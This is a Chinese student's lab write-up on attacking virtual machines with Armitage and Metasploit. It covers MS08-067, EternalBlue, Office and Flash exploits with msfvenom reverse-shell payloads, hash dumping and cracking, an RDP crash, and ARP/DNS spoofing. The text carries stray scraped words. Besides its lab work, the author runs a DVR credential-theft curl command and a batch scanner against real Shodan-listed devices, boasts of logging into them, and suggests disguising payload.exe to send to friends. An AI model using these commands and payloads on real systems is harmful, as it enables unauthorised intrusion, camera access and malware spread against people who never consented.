返回目錄php
10.211.55.10
)10.211.55.14
)10.211.55.16
)返回目錄html
- Armitage基本介紹:
![]()
- Armitage是一款基於Java的Metasploit圖形界面化的攻擊軟件,能夠用它結合 Metasploit中已知的exploit來針對主機存在的漏洞自動化攻擊。經過命令行的方式使用Metasploit難度較高,須要記憶的命令過多,而Armitage完美的解決了這一問題,用戶只須要簡單的點擊菜單,就能夠實現對目標主機的安全測試和攻擊。Armitage良好的圖形展現界面,使得攻擊過程更加直觀,用戶體驗更好。因其操做的簡單性,尤爲適合Metasploit初學者對目標系統進行安全測試和攻擊。
Armitage攻擊目標主機的的通常方法:python
- 目標網絡掃描:爲了肯定目標主機所在網絡結構的網絡拓撲,爲後續目標主機信息搜索和攻擊奠基基礎。
- 目標主機信息蒐集:爲了收集目標主機的漏洞信息,根據收集到的漏洞信息能夠利用Armitage在Metasploit中自動搜索合適的攻擊模塊。
- 目標主機攻擊模塊搜索:主要方法是依據發現的漏洞信息尋找能夠突破目標系統的現有漏洞利用模塊,爲具體的攻擊方案制定提供儘量多的可靠支撐。
返回目錄mysql
/etc/init.d/postgresql start
命令啓動postgresql服務:armitage
命令啓動Armitage(在終端中直接輸入也能夠):返回目錄linux
10.211.55.16
,不過更通常的方法是根據已知信息推導出目標主機所在網段的IP,掃描目標網段完整信息,確認目標網絡拓撲結構以實施網絡偵查。在Armitage上方工具欄中依次選擇Hosts
->Nmap Scan
->Quick Scan(OS detect)
:10.211.55.0/24
:10.211.55.16
,右鍵選擇Services
,查看靶機上開啓的服務:10.211.55.16
,右鍵選擇Scan
,Armitage會調用Metasploit的漏洞掃描模塊,定向掃描靶機,尋找存在的漏洞,爲下一步肯定攻擊方法提供參考依據:10.211.55.16
,依次選擇菜單欄Attacks
->Find Attacks
,Armitage會開始自動搜索尋找合適的攻擊模塊:返回目錄ios
ms08_067漏洞介紹:nginx
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.git
ms08_067_netapi是一款Metasploit中有點老的溢出攻擊載荷,攻擊能夠得到一個相對高的權限。github
CVE ID:CVE-2008-4250算法
原理:攻擊者利用受害者主機默認開放的SMB服務端口445,發送特殊RPC(Remote Procedure Call 遠程過程調用)請求,經過MSRPC over SMB通道調用Server程序中的NEtPathCanonicalize()
函數時觸發,NetPathCanonicalize()
函數在遠程訪問其餘主機時,會調用NetpwPathCanonicalize()
函數,對遠程訪問的路徑進行規範化,而在NetpwPathCanonicalize()
函數中發生了棧緩衝區內存錯誤,形成可被利用實施遠程代碼執行。
危害:攻擊者能遠程主動發起對漏洞主機端口的掃描,而且能直接得到漏洞主機的系統權限,屬於最高嚴重級別的漏洞。
10.211.55.16
主機右鍵能夠發現多了Attack
菜單。依次選擇Attack
->smb
->ms08_067_netapi
菜單,選擇smb漏洞下的ms08_067漏洞對XP靶機進行攻擊(也能夠在Armitage左側樹型目錄下依次選擇exploit
->windows
->smb
->ms08_067_netapi
找到該漏洞):Targets
處配置靶機的系統(通常默認自動檢測靶機系統),勾選Use a reverse connection
,點擊Launch
開始攻擊:Meterpreter 1
->Interact
->Command Shell
,輸入dir
命令查看靶機C:\WINDOWS\system32
目錄下的系統文件:在攻擊成功的靶機上右鍵選擇Meterpreter 1
->Interact
->Meterpreter Shell
,輸入getuid
命令查看靶機當前用戶的權限是SYSTEM權限:
攻擊完成(⁎⁍̴̛ᴗ⁍̴̛⁎):
ms14_064_ole_code_execution漏洞簡介:
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332. The vulnerability is known to affect Internet Explorer 3.0 until version 11 within Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will only target Windows XP and Windows 7 box due to the Powershell limitation. Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other newer Windows systems, the exploit will try using Powershell instead.
CVE ID:CVE-2014-6352
原理及危害:OLE(對象連接與嵌入)是一種容許應用程序共享數據和功能的技術。UAC(User Account Control,用戶賬戶控制)是微軟爲提升系統安全而在Windows Vista中引入的新技術。Microsoft Windows在OLE組件的實現上存在安全漏洞,未經身份驗證的遠程攻擊者可利用此漏洞執行遠程代碼。此漏洞源於沒有正確處理含有OLE對象的Office文件。
exploit
->windows
->browser
->ms14\_064\_ole\_code\_execution
找到該漏洞並雙擊打開配置界面開始配置。注意!此處須要把AllowPowershellPrompt
置爲1!!而後配置好LHOST/RHOST、LPORT/RPORT等信息(把LPORT改爲學號,其他均取默認值),Targets
處配置靶機的系統Windows XP,點擊Launch
開始攻擊:http://10.211.55.10:8080/0KO2YrGZdZ1viW/SrEsdO/
並回車,在靶機看來彷佛並無發生什麼!然而此時Armitage中靶機的圖標已發生明顯變化,代表Kali攻擊機已攻擊成功!!Meterpreter 1
,發現除了上個攻擊實踐中查看Command Shell
和Meterpreter Shell
功能以外,還具備查看瀏覽器文件、進程、截屏等功能!
Explore
->Browse Files
查看瀏覽器文件: Explore
->Show Processes
查看靶機進程(這個比較有用啊emmm):Explore
->Screenshot
進行截屏(據說你是截屏狂魔?):Explore
->Webcam shot
調一波網絡攝像頭(顏控必備233):ms17_010_eternalblue漏洞介紹:
This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.
EternalBlue是2017年席捲全球的WannaCry勒索病毒的罪魁禍首,是微軟近些年來最爲嚴重的遠程代碼執行漏洞,能夠直接得到系統權限。百度上EternalBlue通常指去年爆發的WannaCry,其實是該勒索病毒軟件利用了NSA泄露的危險漏洞EternalBlue進行傳播。關於WannaCry詳見WannaCry - 百度百科以及我去年寫的博客應對WannaCry勒索危機之關閉445端口等危險端口——以本人Windows7系統爲例~
CVE ID:CVE-2017-0143
Hosts
->Nmap Scan
->Quick Scan(OS detect)
並填寫靶機所在網段10.211.55.0/24
搜索存活的主機:10.211.55.16
)一臺win7(IP爲10.211.55.14
):Attacks
->Find Attacks
,Armitage會開始自動搜索靶機尋找合適的攻擊模塊,對於win7右鍵依次選擇Attack
->smb
,能夠發現Armitage提供了5個可供攻擊的smb漏洞,選擇check exploits
檢查這些漏洞是否能被攻擊:ipass_pipe_exec
沒有檢測結果不知道可否進行攻擊以外其餘4個所有陣亡,要麼不可利用(not exploitable)要麼檢測不出來(not support check):exploit
->windows
->smb
->ms17_010_eternalblue
找到傳說中的eternalblue永恆之藍並雙擊打開配置界面,相關配置均用默認值便可:Launch
開始攻擊win7:Use a reverse connection
,點擊Launch
開始攻擊:不過另外一臺靶機就沒那麼給面子了,可能因爲eternalblue只能攻擊Windows 7和Windows server 2008,攻擊xp時會顯示操做系統不匹配攻擊不成功(._.)
Microsoft Office CVE-2017-11882漏洞介紹:
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
這是一個潛伏了17年之久的遠程代碼執行漏洞。該漏洞爲Office內存破壞漏洞,影響目前流行的全部Office版本。原理是利用了Office的一個EQNEDT32.EXE(公式編輯器)組件,攻擊者可以以當前登陸的用戶的身份執行任意命令。詳細請參照打開文檔變肉雞:潛伏17年的「噩夢公式」Office漏洞攻擊分析。
CVE ID:CVE-2017-11882
apt-get install nginx
cd /usr/share/nginx/html/
systemctl start nginx
git clone https://github.com/Ridter/CVE-2017-11882.git
cd CVE-2017-11882/
cve.doc
(靶機在打開該測試文件時同時會自動打開計算器程序calc.exe
,以驗證Office CVE-2017-11882漏洞的存在):python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o cve.doc
cve.doc
放到網站根目錄:cp cve.doc /usr/share/nginx/html/
ls /usr/share/nginx/html/
cve.doc
:
ncat.exe -lv 5314 > cve.doc
ncat -nv 10.211.55.14 5314 < cve.doc
cve.doc
,成功彈出calc.exe
計算器程序,測試成功:exploit
->windows
->fileformat
->office\_ms17\_11882
找到該漏洞並雙擊打開配置界面開始配置,注意有兩處配置須要手動修改:
cve2.doc
!Launch
開始自動化攻擊流程:cve2.doc
所在路徑!cve2.doc
傳到靶機上:win7靶機進入ncat目錄,打開cve2.doc
,觸發訪問10.211.55.10:8080/5314
就會獲得反彈到5314
端口的TCP會話:
因而可憐的靶機又被我攻陷了哈哈哈哈哈!!
來抓個屏笑一個?^_^
Adobe Flash CVE-2018-4878漏洞介紹:
2018年2月1日,Adobe官方發佈了Adobe Flash Player系列產品的安全通告(APSA18-01),一個最新的Adobe Flash 0day漏洞被發現針對韓國地區的人員發起攻擊,該0day漏洞編號爲CVE-2018-4878,目前最新版本28.0.0.137及其之前版本的Adobe Flash Player均受漏洞影響。直到2月5日,Adboe才發佈補丁來修復此0day漏洞。
攻擊者經過構造特殊的Flash連接,並將惡意Flash連接嵌入Office文檔、網頁或者桌面應用,當用戶用瀏覽器/郵件/Office訪問此Flash連接時,會被「遠程代碼執行」,而且直接被getshell。
受影響系統版本:
產品 | 版本 | 平臺 |
---|---|---|
Adobe Flash Player桌面運行時 | 28.0.0.137和更早版本 | Windows,Macintosh |
適用於Google Chrome的Adobe Flash Player | 28.0.0.137和更早版本 | Windows,Macintosh,Linux和Chrome操做系統 |
適用於Microsoft Edge和Internet Explorer 11的Adobe Flash Player | 28.0.0.137和更早版本 | Windows 10和8.1 |
Adobe Flash Player桌面運行時 | 28.0.0.137和更早版本 | Linux |
下載並解壓CVE-2018-4878-master.zip
,輸入命令:
unzip CVE-2018-4878-master.zip
用msfvenom生成shellcode,注意IP地址應爲Kali的IP,輸入命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=5314 -f python > code.txt
查看代碼文件,輸入命令:
cat code.txt
進入CVE-2018-4878-master.zip
的解壓目錄,編輯cve-2018-4878.py
文件,輸入命令:
vim cve-2018-4878.py
將下面紅色標出的部分用剛纔生成的shellcode替換:
而後修改swf文件和html文件路徑爲本身的路徑並保存退出:
用python執行腳本文件生成exploit.swf
和exploit.html
,輸入命令:
python cve-2018-4878-master.py
啓動Apache服務,輸入命令:
service apache2 start
能夠用netstat
命令查看Apache服務是否開啓:
service apache2 status
Apache服務成功開啓後,將以前生成的cp exploit.swf
和exploit.html
複製到apache2服務的網頁目錄下,輸入命令:
cp exploit.swf /var/www/html/exploit.swf
cp exploit.html /var/www/html/exploit.html
至此,攻擊環境基本配置完成,如今只要受害者訪問咱們的連接就能夠直接被遠程控制!
使用handler監聽模塊,輸入命令:
use exploit/multi/handler
將攻擊載荷設置爲咱們在生成文件的時候所選擇的攻擊載荷(此處爲反彈TCP鏈接),輸入命令:
set payload windows/meterpreter/reverse_tcp
設置Kali攻擊機的IP和監聽端口(咱們在用msfvenom生成shellcode時設置的端口),輸入命令:
set LHOST 10.211.55.10 set LPORT 5314
攻擊配置完成,開啓監聽,輸入命令:
exploit
萬事俱備,就等靶機一個反彈鏈接騷操做啦>_<
http://10.211.55.10:8088/exploit.html
:這是...遠程桌面控制嗎?!
然鵝很遺憾個人win7靶機並沒裝VNC viewer...因此此次就算了吧>_<暫時放過你233
CVE-2018-9995漏洞介紹:
2018年5月1日,一名阿根廷安全研究人員Ezequiel Fernandez發佈了一款功能強大的新型黑客工具,能夠輕鬆地提取各類數字視頻錄像機(DVR)品牌的明文憑證,並授予攻擊者訪問這些系統的權限,本質上來講就是容許用戶隨意查看DVR錄製的視頻記錄。
該工具名爲「getDVR_Credentials」,是CVE-2018-9995的概念驗證(proof-of-concept,簡稱PoC),而CVE-2018-9995是Fernandez於上月初發現的一個安全漏洞。
GNU rsp/1.0
(還可使用zoomeye,fofa,google等搜索引擎搜索設備,這裏我就未作其餘嘗試了):使用curl命令獲取該MDVR設備的登陸密碼(條件是存在device.rsp
頁面並可訪問),這簡直是一條萬能的命令啊:
curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
輸入任一組用戶名和密碼以後就能登陸DVR設備了>_ <能夠說很是易行且致命> _ <因爲某些緣由這裏就再也不上圖啦> _<
Kali攻擊機打開終端,依次輸入如下命令進行安裝配置:
git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git cd CVE-2018-9995_dvr_credentials pip install -r requirements.txt
一切準備就緒,開始攻擊!!!輸入如下命令:
python getDVR_Credentials.py --host HOST --p PORT
--p PORT
不指出也行喔!
emmmm成功啦,能夠看出這臺XVR設備存在弱口令漏洞,密碼居然爲空666666再黑進一波,溜了~
vim CVE-2018-9995_check.py
新建CVE-2018-9995_check.py
;這裏咱們直接拿來hzkey大佬的腳本,該腳本用來批量檢測咱們輸入送檢的DVR系列設備是否存在login.rsp
頁面,輸入如下代碼而後保存並退出:
import tableprint as tp import sys import requests import re class Colors: GREEN = '\033[32m' RED = '\033[0;31m' BLUE = '\033[*]' ORANGE = '\033[33m' def check_host(host): try: print(Colors.ORANGE+"Checking : %s"%host) url = 'http://' + host+'/login.rsp' rr= requests.get(url,timeout=30,allow_redirects=False) if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]): print(Colors.GREEN+"[*] CVE-2018-9995 Detection :Url is %s"%url) ff=open('result.txt','a+') ff.write('%s\n'%(url)) except: pass if __name__ == '__main__': if len(sys.argv) < 2: print(Colors.BLUE+"""Usage: Python3 CVE-2018-9995.py host.txt host.txt:127.0.0.1:8080 or www.baidu.com """) if len(sys.argv) >= 2: file = open(sys.argv[1]) for i in file: i = i.strip() check_host(i) file.close()
vim host.txt
新建host.txt
,內容能夠爲shodan等搜索引擎上搜到的設備的IP:PORT
(能夠不寫端口)或者域名的形式;輸入如下命令:
python CVE-2018-9995_check.py host.txt
腳本運行後對使用了DVR系列攝像頭的host會保存到result.txt
文件裏:
嘖嘖嘖shodan第一頁上10臺DVR系列的設備居然有9臺存在漏洞!抱歉咱們Hacker就是能夠隨心所欲!!!
Metasploit的輔助模塊主要用於信息蒐集階段,功能包括掃描、口令猜解、敏感信息嗅探、FUZZ測試發掘漏洞、實施網絡協議欺騙等。這些模塊能夠分爲Admin、Scanner、Server三個大類。
端口 | 協議或服務 | 模塊名 | 路徑 | 功能 |
---|---|---|---|---|
信息收集 | psnuffle | auxiliary/sniffer/psnuffle | 嗅探抓包 | |
dir_scanner | auxiliary/scanner/http/dir_scanner | 掃描網站目錄 | ||
search_email_collector | auxiliary/gather/search_email_collector | 搜索網站中的E-mail | ||
服務掃描及利用 | syn | auxiliary/scanner/portscan/syn | SYN端口掃描 | |
tcp | auxiliary/scanner/portscan/tcp | TCP端口掃描 | ||
xmas | auxiliary/scanner/portscan/xmas | TCP "XMas"端口掃描 | ||
ack | auxiliary/scanner/portscan/ack | ACK防火牆掃描 | ||
arp_sweep | auxiliary/scanner/discovery/arp_sweep | 探測網段中存活主機 | ||
21 | FTP | ftp_version | auxiliary/scanner/ftp/ftp_version | FTP主機掃描 |
anonymos | auxiliary/scanner/ftp/anonymos | FTP匿名登陸 | ||
22 | SSH | ssh_version | auxiliary/scanner/ssh/ssh_version | SSH服務掃描 |
ssh_login | auxiliary/scanner/ssh/ssh_login | SSH口令猜想 | ||
23 | Telnet | telnet_version | auxiliary/scanner/telnet/telnet_version | Telnet服務掃描 |
telnet_login | auxiliary/scanner/telnet/telnet_login | Telnet口令猜想 | ||
25 | SMTP | smtp_version | auxiliary/scanner/smtp/smtp_version | SMTP版本掃描 |
smtp_enum | auxiliary/scanner/smtp/smtp_enum | SMTP枚舉 | ||
69 | TFTP | tftpbrute | auxiliary/scanner/tftp/tftpbrute | FTP文件掃描 |
anonymous | auxiliary/scanner/ftp/anonymous | FTP匿名登陸 | ||
13九、445 | SMB | smb_version | auxiliary/scanner/smb/smb_version | 掃描操做系統版本 |
smb_lookupsid | auxiliary/scanner/smb/smb_lookupsid | 掃描組的用戶 | ||
smb_login | auxiliary/scanner/smb/smb_login | 用於登陸 | ||
smb_enumusers | auxiliary/scanner/smb/smb_enumusers | 枚舉系統上的用戶 | ||
161 | SNMP | snmp_enum | auxiliary/scanner/snmp/snmp_enum | 批量檢測SNMP |
snmp_login | auxiliary/scanner/snmp/snmp_login | 掃描SNMP主機 | ||
1521 | oracle | tnslsnr_version | auxiliary/scanner/oracle/tnslsnr_version | oracle服務掃描 |
1433 | mssql | mssql_ping | auxiliary/scanner/mssql/mssql_ping | 掃描開放mssql主機 |
3306 | mysql | mysql_login | auxiliary/scanner/mysql/mysql_login | mysql口令猜想 |
5432 | postgres | postgres_login | auxiliary/scanner/postgres/postgres_login | postgres口令猜想 |
8080 | tomcat | tomcat_mgr_login | auxiliary/scanner/http/tomcat_mgr_login | tomcat口令猜想 |
jtr_linux密碼破解模塊簡介:
This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower.
John the Ripper簡介:
The John The Ripper module is used to identify weak passwords that have been acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal of this module is to find trivial passwords in a short amount of time. To crack complex passwords or use large wordlists, John the Ripper should be used outside of Metasploit. This initial version just handles LM/NTLM credentials from hashdump and uses the standard wordlist and rules.
分別將不一樣用戶名對應的密碼通過MD5在線加密以後獲得Hash值,得到下面這張表:
用戶名 | 密碼 | Hash |
---|---|---|
admin | admin | 21232f297a57a5a743894a0e4a801fc3 |
user | user | ee11cbb19052e40b07aac0ca060c23ee |
Tom | password | 5f4dcc3b5aa765d61d8327deb882cf99 |
jtr_linux | abc123 | e99a18c428cb38d5f260853678922e03 |
20155314 | qwertyu123. | 682e9cfe26d949a10009cfc9969076ad |
kxjsjc@163.com | kxjsjc_wx_1553 | d80b3f4f2517d9a3ecf2a1e8031f6ff1 |
hashes.txt
的文本文件,把表中信息添加進去,每行包含一個用戶名和一個Hash,以:
分隔(username:hash
):auxiliary
->analyze
->jtr_linux
並雙擊打開開始配置,配置好JOHN_PATH而後點Launch
:show options
命令還能夠查看模塊的有效選項及其詳細描述:hashes.txt
而報錯:(john --wordlist=/tmp/jtrtmp20180502-5917-ctqwpk --format=raw-md5 hashes.txt
至於剩下的兩個,多是我把密碼設置得太複雜的緣由吧一直沒破解出來(ー ー;)將--wordlist
選項去掉採用暴力破解的方式也一直沒跑出來(ー ー;)時間緣由跑了不到10分鐘就被我掐掉了感受速度仍是比彩虹表要慢不少啊(ー ー;)
MS12-020 Microsoft Remote Desktop Use-After-Free Denial of Service模塊簡介:
This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.
UAF(Use-After-Free)釋放重引用漏洞簡介:
Use-After-Free是一種內存破壞漏洞,成因是一塊堆內存被釋放了以後又被使用(指針存在)。這個引用的結果是不可預測的。
舉例:假設一個對象A前4字節(0x400000)爲函數printf,釋放後,惡意用戶重用這個空間,將前4字節改成(0x4a0000)system函數,而後來到漏洞的觸發點,程序因爲疏忽再次調用A的printf,卻調用了system函數。
MS12-020全稱Microsoft Windows遠程桌面協議RDP遠程代碼執行漏洞。
CVE ID:CVE-2012-0152
原理:使用了CVE-2012-0152遠程桌面協議RDP拒絕訪問漏洞。遠程桌面協議(RDP, Remote Desktop Protocol)是一個多通道(multi-channel)的協議,讓用戶(客戶端或稱「本地電腦」)連上提供微軟終端機服務的電腦(服務器端或稱「遠程電腦」)。Windows在處理某些對象時存在錯誤,可經過特製的RDP報文訪問未初始化的或已經刪除的對象,致使任意代碼執行,而後控制系統。
危害:若存在該漏洞,其最嚴重的狀況可能會形成被攻擊系統被遠程執行任意代碼,而一般狀況下會形成對方藍屏或重啓。
windows + R
打開運行,輸入services.msc
打開計算機服務管理,啓動遠程桌面服務(默認是禁止的):netstat -a
查看端口開放狀況,能夠看到此時3389端口已經開放:Kali攻擊機打開Armitage,在上方工具欄中依次選擇Hosts
->Nmap Scan
->Quick Scan(OS detect)
,填寫靶機所在網段10.211.55.0/24
,而後選中靶機10.211.55.14
,右鍵選擇Services
,查看靶機上開啓的服務:
可見靶機已經開啓了3389遠程服務,那麼接下來咱們利用Armitage中MS12-020這個RDP拒絕訪問漏洞輔助模塊來進行攻擊!
在Armitage左側樹型目錄下依次選擇auxiliary
->dos
->windows
>rdp
>ms12_020_maxchannelids
(也可直接在下方搜索欄輸入關鍵字搜索,更快)並雙擊打開配置,發現RHOST和RPORT已經被默認設置爲靶機的配置,咱們直接點擊Launch
便可進行攻擊:
Armitage這邊顯示靶機的RDP協議seems down,一看靶機那邊瞬間藍屏( ̀⌄ ́)哦喲攻擊成功!!!
咱們的口號是——藍屏的*,好喝的*!(廣告莫名植入)
同時,咱們能夠從藍屏信息中看出此次藍屏是因爲RPDWD.SYS
引發的內存地址異常(0x00000050),有分析稱出現漏洞的罪魁禍首是該文件中的HandleAttachUserReq()
函數。
隨後win7靶機自動重啓,而後彈窗提示剛剛異常關機了(廢話不異常纔怪呢嘿嘿嘿):
咱們還能夠將Exp7中用到的setoolkit和Armitage配合使用進行社會工程學攻擊,實現靶機自動上線並獲取靶機Administer帳戶登陸密碼!
setoolkit
命令啓動SET工具,而後輸入y
,出現歡迎頁面,選擇1
進行社會工程學攻擊:4
生成一個payload和監聽:2
Windows Reverse_TCP Meterpreter:yes
: payload.exe
目錄並找到該文件:payload.exe
利用ncat傳到靶機並運行:
ncat.exe -lv 5314 > payload.exe
ncat -nv 10.211.55.14 5314 < payload.exe
sessions
命令查看當前可鏈接的會話,並用sessions -i
進行鏈接:Armitage
->Listeners
->Set LHOST
,填寫Kali攻擊機IP地址:Reverse(wait for)
設置端口和類型:此時靶機重啓並運行咱們的payload.exe
時,目標會自動出如今Armitage控制檯界面內並被開啓Meterpreter會話:
這就輕易地實現靶機自動上線了!還在等什麼趕快把這個exe文件改個名換個圖標假裝一下發給你的小夥伴們吧(壞笑)~
接下來咱們將經過抓取管理員Hash值的方法破解靶機的開機密碼!首先在攻擊成功的靶機上右鍵依次選擇Meterpreter 1
->Access
->Dump Hashes
->registry method
:
能夠看出Dump Hashes的原理是從SAM文件中dump域帳戶的密碼hash,話很少說直接用默認配置Launch
:
sessions
命令查看會話,而後用sessions -i 1
命令進入會話1
:getuid
命令查看當前帳戶名爲crazymosquito,再用getsystem
命令提權:計算機管理(本地)
->本地用戶和組
->用戶
,在Administrator
上右擊【屬性】,把帳戶已禁用
前面的勾去掉便可:是(Y)
:爲了體現出當前帳戶的變化咱們應註銷當前用戶並從新登陸Administrator帳戶,而後點開payload.exe
從新回連Kali,此時回到Armitage能夠看到直接回連成功(靶機下方描述爲ODCE\Administrator
):
3
,發現已經能夠成功提權(靶機下方描述變爲NT AUTHORITY\SYSTEM
):此時能夠看到成功抓取到Hash值!
Ophcrack工具介紹:
Ophcrack是一款利用彩虹表來破解Windows密碼的圖形界面化工具。
彩虹表(Rainbow Table)是一種破解Hash算法(找到碰撞)的技術,將暴力破解和字典兩種經常使用的攻擊方法結合起來,用一個大型數據字典來進行快速匹配暴力破解,以空間換時間,破解效率大幅度提升。
LM(LanManager)是Windows古老而脆弱的密碼加密方式。任何大於7位的密碼都被分紅以7爲單位的幾個部分,最後不足7位的密碼以0補足7位,而後經過加密運算最終組合成一個hash。因此實際上經過破解軟件分解後,LM密碼破解的上限就是7位,這使得以今天的PC運算速度在短期內暴力破解LM加密的密碼成爲可能(上限是兩週),若是使用彩虹表,那麼這個時間數量級可能被降低到小時。
和Armitage相似,咱們能夠經過菜單欄05-Password文件夾下找到Ophcrack的圖標直接打開她:
首先,咱們須要從官網下載Ophcrack提供的彩虹表文件。Ophcrack官網提供的彩虹表有XP和Vista兩個版本:
XP版本提供了四個免費的彩虹表:XP free small (380MB)
、XP free fast (703MB)
、XP special (7.5GB)
和XP german (7.4GB)
:
選擇最小的那個查看介紹學習一波:
XP free small (380MB)
標識:SSTIC04-10k
破解成功率: 99.9%
字母數字表:123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
該表有大小寫字母加數字生成,大小爲380MB,包含全部字母數字混合密碼中99.9%的LanManager表。這些都是用大小寫字母和數字組成的密碼(大約800億組合)。
因爲LanManager哈希表將密碼截成每份7個字符的兩份,咱們就能夠用該表破解長度在1到14之間的密碼。因爲LanManager哈希表也是不區分大小寫的,該表中的800億的組合就至關於(12*10)^11(或者2^83)個密碼,所以也被稱爲「字母數字表10K」。
Vista版本的彩虹表有Vista free (461MB)
、Vista proba free (581MB)
、Vista special (8.0GB)
和Vista num (3.0GB)
:
因爲這裏測試的是win7的密碼並且是簡單密碼,咱們下載Vista版本的Vista proba free(581MB)
便可:
咱們還能夠看出彩虹表大小大體和字符集、可以破解密碼長度有關,設置的字符集越複雜、能破解的長度越長彩虹表的體積就越龐大(咱們密碼技術競賽用到的彩虹表超過500G)!
下載完以後,咱們打開Ophcrack工具,點擊上方工具欄的Tables
:
點擊右下角的Install
:
選擇咱們下載的彩虹表文件(解壓以後獲得的文件夾):
此時對應的彩虹表項會變綠表示可用,點擊OK
返回:
在上方工具欄依次選擇Load
->Single hash
:
把咱們剛纔dump到的Hash值複製過來,點擊OK
進行破解:
秒破解!顯示win7靶機的開機密碼爲空(其實根本就沒設置233)!
沒意思?那咱們來給Administrator設個密碼試試!
又回到熟悉的操做啦>_<
從新登陸一下(密碼就不告訴你),而後用payload.exe
回連:
Armitage這邊回連成功後使用hashdump:
將最後這一串複製到Ophcrack中,點擊工具欄中的Crack
開始破解:
能夠看到已經開始加載彩虹表進行破解,下方記錄了進度和所用時間:
最後Ophcrack只用2分19秒就把win7靶機這個字母數字混合的密碼給破解出來了!能夠看出彩虹表的性能仍是很是驚人的>_<
Bettercap工具介紹:
Bettercap是一個比Exp7中用到的ettercap更先進、好用的也是目前咱們能獲取到的功能最完備的一個中間人攻擊框架。雖然Bettercap沒有GUI界面,可是它仍然很好上手,使用起來特別便利。使用者只須要根據幫助文檔將一個個命令組合起來就可使用其各類強大的功能。
使用Bettercap時咱們並不須要像使用ettercap同樣先行掃描局域網內的主機,Bettercap會幫咱們自動完成掃描主機的任務,而且能夠實時發現網絡中新接入的設備。若是你想手動指定攻擊目標,Bettercap容許咱們經過命令來關閉自動發現設備的功能而且手動指定要攻擊的單個目標或是部分網段/整個網段。
中間人攻擊原理:
DNS欺騙是一種中間人攻擊形式,具體能夠參考個人Exp7博客:2017-2018-2 20155314《網絡對抗技術》Exp7 網絡欺詐防範
dnsspoof原理:
dnsspoof啓用DNS欺騙,若是dnsspoof嗅探到局域網內有DNS請求數據包,它會分析其內容,並用僞造的DNS響應包來回復請求者。若是是請求解析某個域名,dnsspoof會讓該域名從新指向另外一個IP地址(黑客所控制的主機),若是是反向IP指針解析,dnsspoof也會返回一個僞造的域名。
Armitage browser_autopwn模塊簡介:
This module has three actions. The first (and the default) is 'WebServer' which uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them. Next is 'DefangedDetection' which does only the fingerprinting part. Lastly, 'list' simply prints the names of all exploit modules that would be used by the WebServer action given the current MATCH and EXCLUDE options. Also adds a 'list' command which is the same as running with ACTION=list.
Kali下並無集成Bettercap,咱們須要本身安裝(不大,才4M左右),終端中輸入命令:
sudo apt-get install bettercap
新建一個名爲test.hosts
的hosts文件用於DNS欺騙,輸入命令:
vim test.hosts
內容以下,IP爲Kali攻擊機的IP(別忘了後面的*
):
開啓Apache服務:
service apache2 start
進入Apache根目錄/var/www/html
,輸入命令:
cd /var/www/html
新建index.php
,並輸入如下代碼而後保存退出:
<?php header("Location:http://10.211.55.10:8088"); ?>
這樣在DNS欺騙後會跳到指定IP(Kali攻擊機IP),而後在經過php重定向到咱們的payload。
在Armitage左側樹型目錄下依次選擇auxiliary
->server
->browser_autopwn
並雙擊打開配置,直接用默認設置便可,點擊Launch
:
老規矩會進行一系列自動化配置:
等待全部payload加載完成,一共20個:
咱們打開一個新的終端窗口,輸入命令bettercap
開啓bettercap:
能夠用bettercap -h
命令查看幫助文檔:
與老版本不一樣,新版(v2.0之後)的bettercap須要用-autostart
參數來加載相應模塊!
攻擊前,靶機用arp -a
命令查看arp緩存表:
開始arp欺騙攻擊,輸入命令:
bettercap -autostart arp.spoof,net.sniff on
咱們能夠在靶機中看到她已被成功欺騙>_ <把kali攻擊機當成網關啦> _<
Kali這邊開始用dnsspoof進行DNS欺騙,輸入命令:
dnsspoof -f /root/test.hosts
如今同一網關下的靶機無論打開什麼URL都會解析到咱們的URL中!
/etc/init.d/postgresql start
命令啓動postgresql服務,重啓Armitage便可:Armitage是圖形化的Metasploit,其操做圍繞着msfconsole展開,經過標籤管理各類程序和各種資訊,能夠同時處理多個msfconsole或session,大大下降了Metasploit操做的複雜度。從安全人員的角度來講,全自動化的Armitage很是有助於管理員對主機的漏洞測試。
